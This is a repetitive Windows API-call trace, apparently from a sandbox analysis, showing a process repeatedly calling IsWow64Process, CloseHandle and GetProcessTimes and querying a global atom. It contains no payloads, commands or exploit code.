	[0136.577] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.577] CloseHandle (hObject=0x2dc) returned 1
	[0136.577] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.577] CloseHandle (hObject=0x2dc) returned 1
	[0136.577] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.577] CloseHandle (hObject=0x2dc) returned 1
	[0136.577] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.577] CloseHandle (hObject=0x2dc) returned 1
	[0136.577] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.578] CloseHandle (hObject=0x2dc) returned 1
	[0136.578] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.578] CloseHandle (hObject=0x2dc) returned 1
	[0136.578] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.578] CloseHandle (hObject=0x2dc) returned 1
	[0136.578] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.578] CloseHandle (hObject=0x2dc) returned 1
	[0136.578] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.579] CloseHandle (hObject=0x2dc) returned 1
	[0136.579] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.579] CloseHandle (hObject=0x2dc) returned 1
	[0136.579] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0136.579] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0136.579] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0136.580] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0136.580] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0136.580] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0136.580] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0136.580] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0136.580] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0136.581] CloseHandle (hObject=0x2dc) returned 1
	[0136.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0136.581] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.581] CloseHandle (hObject=0x2dc) returned 1
	[0136.581] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.581] CloseHandle (hObject=0x2dc) returned 1
	[0136.581] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.581] CloseHandle (hObject=0x2dc) returned 1
	[0136.582] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.582] CloseHandle (hObject=0x2dc) returned 1
	[0136.582] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.582] CloseHandle (hObject=0x2dc) returned 1
	[0136.615] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.615] CloseHandle (hObject=0x2dc) returned 1
	[0136.616] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.616] CloseHandle (hObject=0x2dc) returned 1
	[0136.616] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.616] CloseHandle (hObject=0x2dc) returned 1
	[0136.616] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.616] CloseHandle (hObject=0x2dc) returned 1
	[0136.616] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.616] CloseHandle (hObject=0x2dc) returned 1
	[0136.617] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.617] CloseHandle (hObject=0x2dc) returned 1
	[0136.617] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.617] CloseHandle (hObject=0x2dc) returned 1
	[0136.617] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.617] CloseHandle (hObject=0x2dc) returned 1
	[0136.617] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.617] CloseHandle (hObject=0x2dc) returned 1
	[0136.618] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.618] CloseHandle (hObject=0x2dc) returned 1
	[0136.618] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.618] CloseHandle (hObject=0x2dc) returned 1
	[0136.618] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.618] CloseHandle (hObject=0x2dc) returned 1
	[0136.618] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.618] CloseHandle (hObject=0x2dc) returned 1
	[0136.619] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.619] CloseHandle (hObject=0x2dc) returned 1
	[0136.619] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.619] CloseHandle (hObject=0x2dc) returned 1
	[0136.619] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.619] CloseHandle (hObject=0x2dc) returned 1
	[0136.619] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.619] CloseHandle (hObject=0x2dc) returned 1
	[0136.620] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.620] CloseHandle (hObject=0x2dc) returned 1
	[0136.620] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.620] CloseHandle (hObject=0x2dc) returned 1
	[0136.620] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.620] CloseHandle (hObject=0x2dc) returned 1
	[0136.620] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.620] CloseHandle (hObject=0x2dc) returned 1
	[0136.620] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.621] CloseHandle (hObject=0x2dc) returned 1
	[0136.621] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.621] CloseHandle (hObject=0x2dc) returned 1
	[0136.621] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.621] CloseHandle (hObject=0x2dc) returned 1
	[0136.621] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.621] CloseHandle (hObject=0x2dc) returned 1
	[0136.621] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.621] CloseHandle (hObject=0x2dc) returned 1
	[0136.622] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.622] CloseHandle (hObject=0x2dc) returned 1
	[0136.622] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.622] CloseHandle (hObject=0x2dc) returned 1
	[0136.622] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.622] CloseHandle (hObject=0x2dc) returned 1
	[0136.622] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.622] CloseHandle (hObject=0x2dc) returned 1
	[0136.623] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0136.623] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0136.623] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0136.623] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0136.624] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0136.624] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0136.624] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0136.624] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0136.624] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0136.624] CloseHandle (hObject=0x2dc) returned 1
	[0136.624] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0136.625] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.625] CloseHandle (hObject=0x2dc) returned 1
	[0136.625] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.625] CloseHandle (hObject=0x2dc) returned 1
	[0136.625] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.625] CloseHandle (hObject=0x2dc) returned 1
	[0136.625] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.626] CloseHandle (hObject=0x2dc) returned 1
	[0136.626] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.626] CloseHandle (hObject=0x2dc) returned 1
	[0136.659] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.659] CloseHandle (hObject=0x2dc) returned 1
	[0136.659] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.659] CloseHandle (hObject=0x2dc) returned 1
	[0136.660] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.660] CloseHandle (hObject=0x2dc) returned 1
	[0136.660] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.660] CloseHandle (hObject=0x2dc) returned 1
	[0136.660] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.660] CloseHandle (hObject=0x2dc) returned 1
	[0136.660] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.660] CloseHandle (hObject=0x2dc) returned 1
	[0136.660] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.661] CloseHandle (hObject=0x2dc) returned 1
	[0136.661] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.661] CloseHandle (hObject=0x2dc) returned 1
	[0136.661] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.661] CloseHandle (hObject=0x2dc) returned 1
	[0136.661] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.661] CloseHandle (hObject=0x2dc) returned 1
	[0136.662] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.662] CloseHandle (hObject=0x2dc) returned 1
	[0136.662] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.662] CloseHandle (hObject=0x2dc) returned 1
	[0136.662] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.662] CloseHandle (hObject=0x2dc) returned 1
	[0136.662] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.662] CloseHandle (hObject=0x2dc) returned 1
	[0136.662] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.662] CloseHandle (hObject=0x2dc) returned 1
	[0136.663] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.663] CloseHandle (hObject=0x2dc) returned 1
	[0136.663] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.663] CloseHandle (hObject=0x2dc) returned 1
	[0136.663] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.663] CloseHandle (hObject=0x2dc) returned 1
	[0136.663] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.663] CloseHandle (hObject=0x2dc) returned 1
	[0136.664] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.664] CloseHandle (hObject=0x2dc) returned 1
	[0136.664] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.664] CloseHandle (hObject=0x2dc) returned 1
	[0136.664] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.664] CloseHandle (hObject=0x2dc) returned 1
	[0136.664] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.664] CloseHandle (hObject=0x2dc) returned 1
	[0136.664] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.664] CloseHandle (hObject=0x2dc) returned 1
	[0136.665] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.665] CloseHandle (hObject=0x2dc) returned 1
	[0136.665] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.665] CloseHandle (hObject=0x2dc) returned 1
	[0136.665] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.665] CloseHandle (hObject=0x2dc) returned 1
	[0136.665] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.665] CloseHandle (hObject=0x2dc) returned 1
	[0136.666] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.666] CloseHandle (hObject=0x2dc) returned 1
	[0136.666] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.666] CloseHandle (hObject=0x2dc) returned 1
	[0136.666] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0136.666] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0136.666] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0136.667] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0136.667] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0136.667] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0136.667] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0136.667] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0136.667] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0136.668] CloseHandle (hObject=0x2dc) returned 1
	[0136.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0136.668] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.668] CloseHandle (hObject=0x2dc) returned 1
	[0136.668] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.668] CloseHandle (hObject=0x2dc) returned 1
	[0136.668] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.668] CloseHandle (hObject=0x2dc) returned 1
	[0136.669] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.669] CloseHandle (hObject=0x2dc) returned 1
	[0136.669] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.669] CloseHandle (hObject=0x2dc) returned 1
	[0136.702] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.702] CloseHandle (hObject=0x2dc) returned 1
	[0136.702] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.702] CloseHandle (hObject=0x2dc) returned 1
	[0136.702] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.702] CloseHandle (hObject=0x2dc) returned 1
	[0136.702] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.702] CloseHandle (hObject=0x2dc) returned 1
	[0136.703] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.703] CloseHandle (hObject=0x2dc) returned 1
	[0136.703] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.703] CloseHandle (hObject=0x2dc) returned 1
	[0136.703] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.703] CloseHandle (hObject=0x2dc) returned 1
	[0136.703] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.703] CloseHandle (hObject=0x2dc) returned 1
	[0136.704] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.704] CloseHandle (hObject=0x2dc) returned 1
	[0136.704] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.704] CloseHandle (hObject=0x2dc) returned 1
	[0136.704] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.704] CloseHandle (hObject=0x2dc) returned 1
	[0136.704] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.704] CloseHandle (hObject=0x2dc) returned 1
	[0136.705] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.705] CloseHandle (hObject=0x2dc) returned 1
	[0136.705] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.705] CloseHandle (hObject=0x2dc) returned 1
	[0136.705] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.705] CloseHandle (hObject=0x2dc) returned 1
	[0136.705] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.705] CloseHandle (hObject=0x2dc) returned 1
	[0136.706] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.706] CloseHandle (hObject=0x2dc) returned 1
	[0136.706] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.706] CloseHandle (hObject=0x2dc) returned 1
	[0136.706] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.706] CloseHandle (hObject=0x2dc) returned 1
	[0136.706] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.706] CloseHandle (hObject=0x2dc) returned 1
	[0136.707] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.707] CloseHandle (hObject=0x2dc) returned 1
	[0136.707] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.707] CloseHandle (hObject=0x2dc) returned 1
	[0136.707] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.707] CloseHandle (hObject=0x2dc) returned 1
	[0136.707] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.707] CloseHandle (hObject=0x2dc) returned 1
	[0136.708] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.708] CloseHandle (hObject=0x2dc) returned 1
	[0136.708] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.708] CloseHandle (hObject=0x2dc) returned 1
	[0136.708] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.708] CloseHandle (hObject=0x2dc) returned 1
	[0136.708] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.709] CloseHandle (hObject=0x2dc) returned 1
	[0136.709] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.709] CloseHandle (hObject=0x2dc) returned 1
	[0136.709] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.709] CloseHandle (hObject=0x2dc) returned 1
	[0136.710] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0136.710] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0136.710] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0136.710] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0136.710] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0136.711] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0136.711] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0136.711] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0136.711] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0136.711] CloseHandle (hObject=0x2dc) returned 1
	[0136.711] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0136.711] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.711] CloseHandle (hObject=0x2dc) returned 1
	[0136.712] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.712] CloseHandle (hObject=0x2dc) returned 1
	[0136.712] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.712] CloseHandle (hObject=0x2dc) returned 1
	[0136.712] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.712] CloseHandle (hObject=0x2dc) returned 1
	[0136.712] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.712] CloseHandle (hObject=0x2dc) returned 1
	[0136.745] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.745] CloseHandle (hObject=0x2dc) returned 1
	[0136.745] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.745] CloseHandle (hObject=0x2dc) returned 1
	[0136.745] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.746] CloseHandle (hObject=0x2dc) returned 1
	[0136.746] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.746] CloseHandle (hObject=0x2dc) returned 1
	[0136.746] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.746] CloseHandle (hObject=0x2dc) returned 1
	[0136.746] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.746] CloseHandle (hObject=0x2dc) returned 1
	[0136.746] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.746] CloseHandle (hObject=0x2dc) returned 1
	[0136.747] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.747] CloseHandle (hObject=0x2dc) returned 1
	[0136.747] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.747] CloseHandle (hObject=0x2dc) returned 1
	[0136.747] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.747] CloseHandle (hObject=0x2dc) returned 1
	[0136.747] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.748] CloseHandle (hObject=0x2dc) returned 1
	[0136.748] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.748] CloseHandle (hObject=0x2dc) returned 1
	[0136.748] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.748] CloseHandle (hObject=0x2dc) returned 1
	[0136.748] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.748] CloseHandle (hObject=0x2dc) returned 1
	[0136.748] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.749] CloseHandle (hObject=0x2dc) returned 1
